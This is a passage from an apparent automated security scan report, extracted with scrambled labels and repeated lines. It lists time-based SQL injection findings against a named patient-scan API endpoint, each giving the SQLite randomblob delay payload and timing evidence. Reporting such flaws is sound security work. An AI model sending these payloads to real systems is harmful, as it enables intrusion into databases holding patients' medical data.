The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [806] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [960] milliseconds, when the original unmodified query with value [200] took

[771] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Evidence

Evidence

Other

Info

Other Info

Evidence

Other Info

Evidence

Other Info

URL

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [917] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,191] milliseconds, when the original unmodified query with value [467]

took [861] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [917] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,191] milliseconds, when the original unmodified query with value [467]

took [861] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [984] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,061] milliseconds, when the original unmodified query with value [232]

took [764] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [984] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,061] milliseconds, when the original unmodified query with value [232]

took [764] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [996] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,290] milliseconds, when the original unmodified query with value [213]

took [415] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [996] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,290] milliseconds, when the original unmodified query with value [213]

took [415] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,044] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,513] milliseconds, when the original unmodified query with value [8] took

[791] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,044] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,513] milliseconds, when the original unmodified query with value [8] took

[791] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

Other

Info

Evidence

Evidence

Other Info

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,101] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,192] milliseconds, when the original unmodified query with value [230] took [2,527] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,101] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,192] milliseconds, when the original unmodified query with value [230] took [2,527] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,171] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,507] milliseconds, when the original unmodified query with value [166] took [1,045] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,171] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,507] milliseconds, when the original unmodified query with value [166] took [1,045] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,174] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,392] milliseconds, when the original unmodified query with value [312.13463469860596] took [1,075] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,174] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,392] milliseconds, when the original unmodified query with value [312.13463469860596] took [1,075] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,186] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,239] milliseconds, when the original unmodified query with value [195] took [529] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,186] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,239] milliseconds, when the original unmodified query with value [195] took [529] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,213] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [2,097] milliseconds, when the original unmodified query with value [4] took [2,015] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,213] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,097] milliseconds, when the original unmodified query with value [4] took

[2,015] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,216] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,157] milliseconds, when the original unmodified query with value [122] took

[787] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,216] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,157] milliseconds, when the original unmodified query with value [122] took [787] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,231] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,606] milliseconds, when the original unmodified query with value [76] took

[1,223] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,231] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,606] milliseconds, when the original unmodified query with value [76] took

[1,223] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,256] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,517] milliseconds, when the original unmodified query with value [178] took

[4,375] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,256] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,517] milliseconds, when the original unmodified query with value [178] took

[4,375] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,262] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,119] milliseconds, when the original unmodified query with value [533] took

[1,088] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not

Other Info

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Other Info

null then 1 else 1 end], which caused the request to take [1,262] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,119] milliseconds, when the original unmodified query with value [533]

took [1,088] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,276] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,716] milliseconds, when the original unmodified query with value [203] took

[1,897] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,276] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,716] milliseconds, when the original unmodified query with value [203] took

[1,897] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,283] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,790] milliseconds, when the original unmodified query with value [213] took

[997] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,283] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,790] milliseconds, when the original unmodified query with value [213] took [997] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

POST

Attack

URL

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,373] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,763] milliseconds, when the original unmodified query with value [215] took

[2,840] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,373] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,763] milliseconds, when the original unmodified query with value [215] took [2,840] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,382] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,338] milliseconds, when the original unmodified query with value [193] took

[1,793] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,382] milliseconds, parameter

Other

value [case randomblob(10000000) when not null then 1 else 1 end], which caused the Info

request to take [2,338] milliseconds, when the original unmodified guery with value [193]

took [1,793] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,388] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,597] milliseconds, when the original unmodified query with value [195] took

[1,597] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,388] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,597] milliseconds, when the original unmodified query with value [195] took

[1,597] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,506] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,866] milliseconds, when the original unmodified guery with value [10] took

[2,279] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,506] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,866] milliseconds, when the original unmodified guery with value [10] took

[2,279] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,507] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,071] milliseconds, when the original unmodified query with value [173] took

[1,748] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,507] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,071] milliseconds, when the original unmodified query with value [173] took

[1,748] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,522] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,450] milliseconds, when the original unmodified query with value [237] took

[1,040] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,522] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,450] milliseconds, when the original unmodified query with value [237] took

[1,040] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

Method **POST** Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,538] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,755] milliseconds, when the original unmodified query with value [220] took

[1,563] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,538] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,755] milliseconds, when the original unmodified query with value [220] took

[1,563] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,621] milliseconds, when the original unmodified query with value [154] took

[1,212] milliseconds.

[1,212] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,621] milliseconds, when the original unmodified query with value [154] took

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,548] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,063] milliseconds, when the original unmodified query with value [215] took

[4,093] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,548] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,063] milliseconds, when the original unmodified query with value [215] took

[4,093] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,566] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,815] milliseconds, when the original unmodified query with value [234] took

[1,315] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,566] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,815] milliseconds, when the original unmodified query with value [234] took

[1,315] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

Other Info

Method

Attack

Evidence

Other

Info

URL

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,711] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,112] milliseconds, when the original unmodified query with value [169] took [1,138] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,711] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,112] milliseconds, when the original unmodified query with value [169] took [1,138] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,721] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,803] milliseconds, when the original unmodified query with value [222] took

[2,106] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,721] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,803] milliseconds, when the original unmodified query with value [222] took [2,106] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,722] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,773] milliseconds, when the original unmodified query with value [183] took

[840] milliseconds.

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,722] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,773] milliseconds, when the original unmodified query with value [183] took [840] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,729] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,726] milliseconds, when the original unmodified query with value [123] took

[2,899] milliseconds.

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,729] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,726] milliseconds, when the original unmodified query with value [123] took [2,899] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,758] milliseconds, parameter

Evidence

value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,561] milliseconds, when the original unmodified query with value [120] took [1,639] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,758] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,561] milliseconds, when the original unmodified query with value [120] took [1,639] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,094] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [7,477] milliseconds, when the original unmodified query with value [213] took

[1,588] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,094] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [7,477] milliseconds, when the original unmodified query with value [213] took

[1,588] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,099] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,608] milliseconds, when the original unmodified query with value [232] took

[1,973] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,099] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,608] milliseconds, when the original unmodified query with value [232] took [1,973] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

URL

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,021] milliseconds, when the original unmodified query with value [71] took [4,300] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,021] milliseconds, when the original unmodified query with value [71] took [4,300] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,241] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,887] milliseconds, when the original unmodified query with value [621] took [1,637] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,241] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,887] milliseconds, when the original unmodified query with value [621] took [1,637] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,463] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,987] milliseconds, when the original unmodified query with value [576] took

[2,147] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,463] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,987] milliseconds, when the original unmodified query with value [576] took

[2,147] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,511] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,937] milliseconds, when the original unmodified query with value [242] took

[3,562] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,511] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,937] milliseconds, when the original unmodified query with value [242] took

[3,562] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,847] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,154] milliseconds, when the original unmodified query with value [773] took

[1,979] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,847] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,154] milliseconds, when the original unmodified query with value [773] took

[1,979] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [262] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,298] milliseconds, when the original unmodified query with value [103] took

[3,572] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [262] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [1,298] milliseconds, when the original unmodified query with value [103]

took [3,572] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

Other Info

Evidence

Evidence

Other Info

Method

Attack

Evidence

Other Info

Evidence

Other

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [263] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [999] milliseconds, when the original unmodified query with value [155] took

[364] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [263] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [999] milliseconds, when the original unmodified query with value [155] took

[364] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,092] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,188] milliseconds, when the original unmodified query with value [239] took

[2,429] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,092] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,188] milliseconds, when the original unmodified query with value [239] took

[2,429] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,156] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,238] milliseconds, when the original unmodified query with value [208] took

[2,042] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,156] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,238] milliseconds, when the original unmodified query with value [208] took

[2,042] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,387] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,530] milliseconds, when the original unmodified query with value [217] took

[1,073] milliseconds.

[1,073] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,387] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,530] milliseconds, when the original unmodified query with value [217] took

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Other

Info

Evidence

Evidence

Other

Info

Method

Attack

Evidence

Other Info

Evidence

Other Info

URL

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [395] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [453] milliseconds, when the original unmodified query with value [173] took

[1,404] milliseconds.

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [395] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [453] milliseconds, when the original unmodified query with value [173] took

[1,404] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,908] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,949] milliseconds, when the original unmodified query with value [137] took

[1,553] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,908] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,949] milliseconds, when the original unmodified query with value [137] took

[1,553] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,473] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,149] milliseconds, when the original unmodified query with value [173] took

[1,901] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,473] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,149] milliseconds, when the original unmodified query with value [173] took

[1,901] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

